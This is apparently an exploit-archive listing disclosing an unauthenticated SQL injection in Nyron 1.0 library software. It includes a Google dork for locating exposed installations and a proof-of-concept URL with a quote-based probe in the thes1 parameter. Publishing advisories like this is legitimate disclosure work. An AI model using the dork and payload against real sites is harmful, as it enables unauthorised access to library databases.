Nyron 1.0 SQL Injection

Nyron 1.0 SQL Injection: Posted Jan 18, 2022; Authored by Miguel Santareno; Nyron version 1.0 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 4888dd80a293310df383ae31afb564897aff9e3209abb795d3b1f0eac77ec6c8; Download | Favorite | View

Nyron 1.0 SQL Injection

# Exploit Title: Nyron 1.0 - SQLi (Unauthenticated)
# Google Dork: inurl:"winlib.aspx"
# Date: 01/18/2021
# Exploit Author: Miguel Santareno
# Vendor Homepage: http://www.wecul.pt/
# Software Link: http://www.wecul.pt/solucoes/bibliotecas/
# Version: < 1.0
# Tested on: windows

# 1. Description

Unauthenticated user can exploit SQL Injection vulnerability in thes1 parameter.


# 2. Proof of Concept (PoC)

https://vulnerable_webiste.com/Nyron/Library/Catalog/winlibsrch.aspx?skey=C8AF11631DCA40ADA6DE4C2E323B9989&pag=1&tpp=12&sort=4&cap=&pesq=5&thes1='">


# 3. Research:
https://miguelsantareno.github.io/edp.pdf

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Nyron 1.0 SQL Injection

Nyron 1.0 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Nyron 1.0 SQL Injection

Share This

Nyron 1.0 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems